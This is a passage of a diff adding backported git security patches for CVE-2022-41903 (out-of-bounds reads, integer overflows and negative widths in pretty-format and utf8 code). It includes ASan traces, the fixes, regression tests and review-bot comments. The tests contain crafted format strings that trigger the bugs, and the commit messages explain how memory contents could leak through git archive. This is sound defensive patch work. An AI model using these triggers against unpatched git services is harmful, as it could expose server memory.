+ #7 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+ #8 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+ #9 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+ #10 0x55ba6f2ea993 in run_builtin git.c:466
+ #11 0x55ba6f2eb397 in handle_builtin git.c:721
+ #12 0x55ba6f2ebb07 in run_argv git.c:788
+ #13 0x55ba6f2ec8a7 in cmd_main git.c:923
+ #14 0x55ba6f581682 in main common-main.c:57
+ #15 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #16 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #17 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x603000000baf is located 1 bytes to the left of 24-byte region [0x603000000bb0,0x603000000bc8)
+ allocated by thread T0 here:
+ #0 0x7f2d08ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x55ba6fa5b494 in xrealloc wrapper.c:136
+ #2 0x55ba6f9aefdc in strbuf_grow strbuf.c:99
+ #3 0x55ba6f9b0a06 in strbuf_add strbuf.c:298
+ #4 0x55ba6f9b1a25 in strbuf_expand strbuf.c:418
+ #5 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+ #6 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+ #7 0x55ba6f7884c8 in show_log log-tree.c:781
+ #8 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
+ #9 0x55ba6f40fed5 in cmd_log_walk_no_free builtin/log.c:508
+ #10 0x55ba6f41035b in cmd_log_walk builtin/log.c:549
+ #11 0x55ba6f4131a2 in cmd_log builtin/log.c:883
+ #12 0x55ba6f2ea993 in run_builtin git.c:466
+ #13 0x55ba6f2eb397 in handle_builtin git.c:721
+ #14 0x55ba6f2ebb07 in run_argv git.c:788
+ #15 0x55ba6f2ec8a7 in cmd_main git.c:923
+ #16 0x55ba6f581682 in main common-main.c:57
+ #17 0x7f2d08c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #18 0x7f2d08c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #19 0x55ba6f2e60e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow pretty.c:1712 in format_and_pad_commit
+ Shadow bytes around the buggy address:
+ 0x0c067fff8120: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
+ 0x0c067fff8130: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
+ 0x0c067fff8140: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
+ 0x0c067fff8150: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa fd fd
+ 0x0c067fff8160: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+ =>0x0c067fff8170: fd fd fd fa fa[fa]00 00 00 fa fa fa 00 00 00 fa
+ 0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c067fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+
+Luckily enough, this would only cause us to copy the out-of-bounds data
+into the formatted commit in case we really had an ANSI sequence
+preceding our buffer. So this bug likely has no security consequences.
+
+Fix it regardless by not traversing past the buffer's start.
+
+Reported-by: Patrick Steinhardt <ps@pks.im>
+Reported-by: Eric Sesterhenn <eric.sesterhenn@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/b49f309aa16febeddb65e82526640a91bbba3be3]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 637e344..4348a82 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1468,7 +1468,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ if (*ch != 'm')
+ break;
+ p = ch - 1;
+- while (ch - p < 10 && *p != '\033')
++ while (p > sb->buf && ch - p < 10 && *p != '\033')
+ p--;
+ if (*p != '\033' ||
+ ch + 1 - p != display_mode_esc_sequence_len(p))
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index a2acee1..e69caba 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,6 +788,12 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with space stealing' '
++ printf mm0 >expect &&
++ git log -1 --pretty="format:mm%>>|(1)%x30" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
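Review bot: The new `p > sb->buf` bound stops the backward scan at the start of the buffer, but the `*p != '\033'` test immediately after the loop still dereferences `p`, which is in bounds only if `p = ch - 1` was already at or after `sb->buf`. That depends on the enclosing loop guaranteeing `ch > sb->buf`, and that loop is outside the hunk, so it should be confirmed in the tree this backport is applied to. If it holds, a comment on the inner loop would record the invariant, for example `/* never scan before sb->buf; the outer loop keeps ch > sb->buf */`. The commit message says the failure shows only with `SANITIZE=address`, so a plain test run presumably passes with or without the fix.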
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
new file mode 100644
index 0000000000..9e3c74ff67
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-04.patch
@@ -0,0 +1,150 @@
+From f6e0b9f38987ad5e47bab551f8760b70689a5905 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:34 +0100
+Subject: [PATCH 04/12] pretty: fix out-of-bounds read when parsing invalid padding format
+
+An out-of-bounds read can be triggered when parsing an incomplete
+padding format string passed via `--pretty=format` or in Git archives
+when files are marked with the `export-subst` gitattribute.
+
+This bug exists since we have introduced support for truncating output
+via the `trunc` keyword a7f01c6 (pretty: support truncating in %>, %<
+and %><, 2013-04-19). Before this commit, we used to find the end of the
+formatting string by using strchr(3P). This function returns a `NULL`
+pointer in case the character in question wasn't found. The subsequent
+check whether any character was found thus simply checked the returned
+pointer. After the commit we switched to strcspn(3P) though, which only
+returns the offset to the first found character or to the trailing NUL
+byte. As the end pointer is now computed by adding the offset to the
+start pointer it won't be `NULL` anymore, and as a consequence the check
+doesn't do anything anymore.
+
+The out-of-bounds data that is being read can in fact end up in the
+formatted string. As a consequence, it is possible to leak memory
+contents either by calling git-log(1) or via git-archive(1) when any of
+the archived files is marked with the `export-subst` gitattribute.
+
+ ==10888==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000398 at pc 0x7f0356047cb2 bp 0x7fff3ffb95d0 sp 0x7fff3ffb8d78
+ READ of size 1 at 0x602000000398 thread T0
+ #0 0x7f0356047cb1 in __interceptor_strchrnul /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725
+ #1 0x563b7cec9a43 in strbuf_expand strbuf.c:417
+ #2 0x563b7cda7060 in repo_format_commit_message pretty.c:1869
+ #3 0x563b7cda8d0f in pretty_print_commit pretty.c:2161
+ #4 0x563b7cca04c8 in show_log log-tree.c:781
+ #5 0x563b7cca36ba in log_tree_commit log-tree.c:1117
+ #6 0x563b7c927ed5 in cmd_log_walk_no_free builtin/log.c:508
+ #7 0x563b7c92835b in cmd_log_walk builtin/log.c:549
+ #8 0x563b7c92b1a2 in cmd_log builtin/log.c:883
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x602000000398 is located 0 bytes to the right of 8-byte region [0x602000000390,0x602000000398)
+ allocated by thread T0 here:
+ #0 0x7f0356072faa in __interceptor_strdup /usr/src/debug/gcc/libsanitizer/asan/asan_interceptors.cpp:439
+ #1 0x563b7cf7317c in xstrdup wrapper.c:39
+ #2 0x563b7cd9a06a in save_user_format pretty.c:40
+ #3 0x563b7cd9b3e5 in get_commit_format pretty.c:173
+ #4 0x563b7ce54ea0 in handle_revision_opt revision.c:2456
+ #5 0x563b7ce597c9 in setup_revisions revision.c:2850
+ #6 0x563b7c9269e0 in cmd_log_init_finish builtin/log.c:269
+ #7 0x563b7c927362 in cmd_log_init builtin/log.c:348
+ #8 0x563b7c92b193 in cmd_log builtin/log.c:882
+ #9 0x563b7c802993 in run_builtin git.c:466
+ #10 0x563b7c803397 in handle_builtin git.c:721
+ #11 0x563b7c803b07 in run_argv git.c:788
+ #12 0x563b7c8048a7 in cmd_main git.c:923
+ #13 0x563b7ca99682 in main common-main.c:57
+ #14 0x7f0355e3c28f (/usr/lib/libc.so.6+0x2328f)
+ #15 0x7f0355e3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #16 0x563b7c7fe0e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:725 in __interceptor_strchrnul
+ Shadow bytes around the buggy address:
+ 0x0c047fff8020: fa fa fd fd fa fa 00 06 fa fa 05 fa fa fa fd fd
+ 0x0c047fff8030: fa fa 00 02 fa fa 06 fa fa fa 05 fa fa fa fd fd
+ 0x0c047fff8040: fa fa 00 07 fa fa 03 fa fa fa fd fd fa fa 00 00
+ 0x0c047fff8050: fa fa 00 01 fa fa fd fd fa fa 00 00 fa fa 00 01
+ 0x0c047fff8060: fa fa 00 06 fa fa 00 06 fa fa 05 fa fa fa 05 fa
+ =>0x0c047fff8070: fa fa 00[fa]fa fa fd fa fa fa fd fd fa fa fd fd
+ 0x0c047fff8080: fa fa fd fd fa fa 00 00 fa fa 00 fa fa fa fd fa
+ 0x0c047fff8090: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa
+ 0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0c047fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==10888==ABORTING
+
+Fix this bug by checking whether `end` points at the trailing NUL byte.
+Add a test which catches this out-of-bounds read and which demonstrates
+that we used to write out-of-bounds data into the formatted message.
+
+Reported-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Original-patch-by: Markus Vervier <markus.vervier@x41-dsec.de>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/f6e0b9f38987ad5e47bab551f8760b70689a5905]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 2 +-
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ 2 files changed, 7 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index 4348a82..c49e818 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1024,7 +1024,7 @@ static size_t parse_padding_placeholder(const char *placeholder,
+ const char *end = start + strcspn(start, ",)");
+ char *next;
+ int width;
+- if (!end || end == start)
++ if (!*end || end == start)
+ return 0;
+ width = strtol(start, &next, 10);
+ if (next == start || width == 0)
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index e69caba..8a349df 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -794,6 +794,12 @@ test_expect_success 'log --pretty with space stealing' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with invalid padding format' '
++ printf "%s%%<(20" "$(git rev-parse HEAD)" >expect &&
++ git log -1 --pretty="format:%H%<(20" >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
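Review bot: `width` is declared `int` but receives the `long` result of `strtol` in the context lines just below the fixed check, so where `long` is wider than `int` an oversized width is narrowed without a range check before `width == 0` is tested. The `!*end` change itself is correct, since `start + strcspn(...)` can never be NULL, but the numeric parse stays unbounded in this hunk. Unless a later patch in this 12-part series bounds the value, consider parsing into a `long` and rejecting what does not fit: `long w = strtol(start, &next, 10);` followed by `if (next == start || w == 0 || w > INT_MAX || w < INT_MIN) return 0;`. The rest of `parse_padding_placeholder` is outside the hunk.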
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
new file mode 100644
index 0000000000..994f7a55b1
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-05.patch
@@ -0,0 +1,98 @@
+From 1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:39 +0100
+Subject: [PATCH 05/12] pretty: fix adding linefeed when placeholder is not expanded
+
+When a formatting directive has a `+` or ` ` after the `%`, then we add
+either a line feed or space if the placeholder expands to a non-empty
+string. In specific cases though this logic doesn't work as expected,
+and we try to add the character even in the case where the formatting
+directive is empty.
+
+One such pattern is `%w(1)%+d%+w(2)`. `%+d` expands to reference names
+pointing to a certain commit, like in `git log --decorate`. For a tagged
+commit this would for example expand to `\n (tag: v1.0.0)`, which has a
+leading newline due to the `+` modifier and a space added by `%d`. Now
+the second wrapping directive will cause us to rewrap the text to
+`\n(tag:\nv1.0.0)`, which is one byte shorter due to the missing leading
+space. The code that handles the `+` magic now notices that the length
+has changed and will thus try to insert a leading line feed at the
+original posititon. But as the string was shortened, the original
+position is past the buffer's boundary and thus we die with an error.
+
+Now there are two issues here:
+
+ 1. We check whether the buffer length has changed, not whether it
+ has been extended. This causes us to try and add the character
+ past the string boundary.
+
+ 2. The current logic does not make any sense whatsoever. When the
+ string got expanded due to the rewrap, putting the separator into
+ the original position is likely to put it somewhere into the
+ middle of the rewrapped contents.
+
+It is debatable whether `%+w()` makes any sense in the first place.
+Strictly speaking, the placeholder never expands to a non-empty string,
+and consequentially we shouldn't ever accept this combination. We thus
+fix the bug by simply refusing `%+w()`.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/1de69c0cdd388b0a5b7bdde0bfa0bda514a354b0]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 14 +++++++++++++-
+ t/t4205-log-pretty-formats.sh | 8 ++++++++
+ 2 files changed, 21 insertions(+), 1 deletion(-)
+
+diff --git a/pretty.c b/pretty.c
+index c49e818..195d005 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1551,9 +1551,21 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ default:
+ break;
+ }
+- if (magic != NO_MAGIC)
++ if (magic != NO_MAGIC) {
+ placeholder++;
+
++ switch (placeholder[0]) {
++ case 'w':
++ /*
++ * `%+w()` cannot ever expand to a non-empty string,
++ * and it potentially changes the layout of preceding
++ * contents. We're thus not able to handle the magic in
++ * this combination and refuse the pattern.
++ */
++ return 0;
++ };
++ }
++
+ orig_len = sb->len;
+ if (((struct format_commit_context *)context)->flush_type != no_flush)
+ consumed = format_and_pad_commit(sb, placeholder, context);
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 8a349df..fa1bc2b 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -800,6 +800,14 @@ test_expect_success 'log --pretty with invalid padding format' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'log --pretty with magical wrapping directives' '
++ commit_id=$(git commit-tree HEAD^{tree} -m "describe me") &&
++ git tag describe-me $commit_id &&
++ printf "\n(tag:\ndescribe-me)%%+w(2)" >expect &&
++ git log -1 --pretty="format:%w(1)%+d%+w(2)" $commit_id >actual &&
++ test_cmp expect actual
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
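Review bot: The added `switch (placeholder[0])` has a single `case 'w':` and is closed with `};`, which leaves a stray empty statement after the block. For one rejected character an `if` reads more directly: `if (placeholder[0] == 'w') return 0;`, with the existing comment kept above it. Since this is a backport, keeping the upstream text unchanged may be preferred; in that case the comment could still state that returning 0 apparently leaves the directive in the output verbatim, which is what the new test expects (`%+w(2)` at the end of `expect`). `format_commit_item` starts and ends outside the hunk.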
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
new file mode 100644
index 0000000000..93fbe5c7fe
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-06.patch
@@ -0,0 +1,90 @@
+From 48050c42c73c28b0c001d63d11dffac7e116847b Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:49 +0100
+Subject: [PATCH 06/12] pretty: fix integer overflow in wrapping format
+
+The `%w(width,indent1,indent2)` formatting directive can be used to
+rewrap text to a specific width and is designed after git-shortlog(1)'s
+`-w` parameter. While the three parameters are all stored as `size_t`
+internally, `strbuf_add_wrapped_text()` accepts integers as input. As a
+result, the casted integers may overflow. As these now-negative integers
+are later on passed to `strbuf_addchars()`, we will ultimately run into
+implementation-defined behaviour due to casting a negative number back
+to `size_t` again. On my platform, this results in trying to allocate
+9000 petabyte of memory.
+
+Fix this overflow by using `cast_size_t_to_int()` so that we reject
+inputs that cannot be represented as an integer.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/48050c42c73c28b0c001d63d11dffac7e116847b]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ git-compat-util.h | 8 ++++++++
+ pretty.c | 4 +++-
+ t/t4205-log-pretty-formats.sh | 12 ++++++++++++
+ 3 files changed, 23 insertions(+), 1 deletion(-)
+
+diff --git a/git-compat-util.h b/git-compat-util.h
+index a1ecfd3..b0f3890 100644
+--- a/git-compat-util.h
++++ b/git-compat-util.h
+@@ -854,6 +854,14 @@ static inline size_t st_sub(size_t a, size_t b)
+ return a - b;
+ }
+
++static inline int cast_size_t_to_int(size_t a)
++{
++ if (a > INT_MAX)
++ die("number too large to represent as int on this platform: %"PRIuMAX,
++ (uintmax_t)a);
++ return (int)a;
++}
++
+ #ifdef HAVE_ALLOCA_H
+ # include <alloca.h>
+ # define xalloca(size) (alloca(size))
+diff --git a/pretty.c b/pretty.c
+index 195d005..ff9fc97 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -898,7 +898,9 @@ static void strbuf_wrap(struct strbuf *sb, size_t pos,
+ if (pos)
+ strbuf_add(&tmp, sb->buf, pos);
+ strbuf_add_wrapped_text(&tmp, sb->buf + pos,
+- (int) indent1, (int) indent2, (int) width);
++ cast_size_t_to_int(indent1),
++ cast_size_t_to_int(indent2),
++ cast_size_t_to_int(width));
+ strbuf_swap(&tmp, sb);
+ strbuf_release(&tmp);
+ }
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index fa1bc2b..23ac508 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -808,6 +808,18 @@ test_expect_success 'log --pretty with magical wrapping directives' '
+ test_cmp expect actual
+ '
+
++test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping directive' '
++ cat >expect <<-EOF &&
++ fatal: number too large to represent as int on this platform: 2147483649
++ EOF
++ test_must_fail git log -1 --pretty="format:%w(2147483649,1,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,2147483649,1)%d" 2>error &&
++ test_cmp expect error &&
++ test_must_fail git log -1 --pretty="format:%w(1,1,2147483649)%d" 2>error &&
++ test_cmp expect error
++'
++
+ test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
+ # We only assert that this command does not crash. This needs to be
+ # executed with the address sanitizer to demonstrate failure.
+--
+2.25.1
+
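Review bot: `cast_size_t_to_int` is added to a shared header without a comment, and its contract is not obvious from the name: it ends the process through `die()` rather than returning an error when the value exceeds `INT_MAX`. A one-line comment would make that explicit for future callers, e.g. `/* Convert size_t to int; die() instead of truncating when the value does not fit. */`. Services that pass untrusted format strings to this code should expect an oversized `%w()` argument to terminate the command with a fatal error, as the new test asserts, and should handle that exit status.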
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
new file mode 100644
index 0000000000..ec248ad6c2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-07.patch
@@ -0,0 +1,123 @@
+From 522cc87fdc25449222a5894a428eebf4b8d5eaa9 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:53 +0100
+Subject: [PATCH 07/12] utf8: fix truncated string lengths in utf8_strnwidth()
+
+The `utf8_strnwidth()` function accepts an optional string length as
+input parameter. This parameter can either be set to `-1`, in which case
+we call `strlen()` on the input. Or it can be set to a positive integer
+that indicates a precomputed length, which callers typically compute by
+calling `strlen()` at some point themselves.
+
+The input parameter is an `int` though, whereas `strlen()` returns a
+`size_t`. This can lead to implementation-defined behaviour though when
+the `size_t` cannot be represented by the `int`. In the general case
+though this leads to wrap-around and thus to negative string sizes,
+which is sure enough to not lead to well-defined behaviour.
+
+Fix this by accepting a `size_t` instead of an `int` as string length.
+While this takes away the ability of callers to simply pass in `-1` as
+string length, it really is trivial enough to convert them to instead
+pass in `strlen()` instead.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/522cc87fdc25449222a5894a428eebf4b8d5eaa9]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ column.c | 2 +-
+ pretty.c | 4 ++--
+ utf8.c | 8 +++-----
+ utf8.h | 2 +-
+ 4 files changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/column.c b/column.c
+index 4a38eed..0c79850 100644
+--- a/column.c
++++ b/column.c
+@@ -23,7 +23,7 @@ struct column_data {
+ /* return length of 's' in letters, ANSI escapes stripped */
+ static int item_length(const char *s)
+ {
+- return utf8_strnwidth(s, -1, 1);
++ return utf8_strnwidth(s, strlen(s), 1);
+ }
+
+ /*
+diff --git a/pretty.c b/pretty.c
+index ff9fc97..c3c1443 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1437,7 +1437,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ int occupied;
+ if (!start)
+ start = sb->buf;
+- occupied = utf8_strnwidth(start, -1, 1);
++ occupied = utf8_strnwidth(start, strlen(start), 1);
+ occupied += c->pretty_ctx->graph_width;
+ padding = (-padding) - occupied;
+ }
+@@ -1455,7 +1455,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ placeholder++;
+ total_consumed++;
+ }
+- len = utf8_strnwidth(local_sb.buf, -1, 1);
++ len = utf8_strnwidth(local_sb.buf, local_sb.len, 1);
+
+ if (c->flush_type == flush_left_and_steal) {
+ const char *ch = sb->buf + sb->len - 1;
+diff --git a/utf8.c b/utf8.c
+index 5c8f151..a66984b 100644
+--- a/utf8.c
++++ b/utf8.c
+@@ -206,13 +206,11 @@ int utf8_width(const char **start, size_t *remainder_p)
+ * string, assuming that the string is utf8. Returns strlen() instead
+ * if the string does not look like a valid utf8 string.
+ */
+-int utf8_strnwidth(const char *string, int len, int skip_ansi)
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi)
+ {
+ int width = 0;
+ const char *orig = string;
+
+- if (len == -1)
+- len = strlen(string);
+ while (string && string < orig + len) {
+ int skip;
+ while (skip_ansi &&
+@@ -225,7 +223,7 @@ int utf8_strnwidth(const char *string, int len, int skip_ansi)
+
+ int utf8_strwidth(const char *string)
+ {
+- return utf8_strnwidth(string, -1, 0);
++ return utf8_strnwidth(string, strlen(string), 0);
+ }
+
+ int is_utf8(const char *text)
+@@ -792,7 +790,7 @@ int skip_utf8_bom(char **text, size_t len)
+ void strbuf_utf8_align(struct strbuf *buf, align_type position, unsigned int width,
+ const char *s)
+ {
+- int slen = strlen(s);
++ size_t slen = strlen(s);
+ int display_len = utf8_strnwidth(s, slen, 0);
+ int utf8_compensation = slen - display_len;
+
+diff --git a/utf8.h b/utf8.h
+index fcd5167..6da1b6d 100644
+--- a/utf8.h
++++ b/utf8.h
+@@ -7,7 +7,7 @@ typedef unsigned int ucs_char_t; /* assuming 32bit int */
+
+ size_t display_mode_esc_sequence_len(const char *s);
+ int utf8_width(const char **start, size_t *remainder_p);
+-int utf8_strnwidth(const char *string, int len, int skip_ansi);
++int utf8_strnwidth(const char *string, size_t len, int skip_ansi);
+ int utf8_strwidth(const char *string);
+ int is_utf8(const char *text);
+ int is_encoding_utf8(const char *name);
+--
+2.25.1
+
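Review bot: In `strbuf_utf8_align()` the utf8.c hunk widens `slen` to `size_t`, but the following line still stores the difference in an `int` (`int utf8_compensation = slen - display_len;`), so a string longer than INT_MAX bytes is narrowed there just as before. Declaring it as `size_t utf8_compensation = slen - display_len;` would keep the byte count intact, provided the code that consumes it accepts a `size_t`. The function body continues past the hunk, so how the value is used afterwards cannot be checked from here.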
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
new file mode 100644
index 0000000000..3de6a5ba6a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-08.patch
@@ -0,0 +1,67 @@
+From 17d23e8a3812a5ca3dd6564e74d5250f22e5d76d Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:47:00 +0100
+Subject: [PATCH 08/12] utf8: fix returning negative string width
+
+The `utf8_strnwidth()` function calls `utf8_width()` in a loop and adds
+its returned width to the end result. `utf8_width()` can return `-1`
+though in case it reads a control character, which means that the
+computed string width is going to be wrong. In the worst case where
+there are more control characters than non-control characters, we may
+even return a negative string width.
+
+Fix this bug by treating control characters as having zero width.
+
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/17d23e8a3812a5ca3dd6564e74d5250f22e5d76d]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/t4205-log-pretty-formats.sh | 6 ++++++
+ utf8.c | 8 ++++++--
+ 2 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index 23ac508..261a6f0 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -820,6 +820,12 @@ test_expect_success SIZE_T_IS_64BIT 'log --pretty with overflowing wrapping dire
+ test_cmp expect error
+ '
+
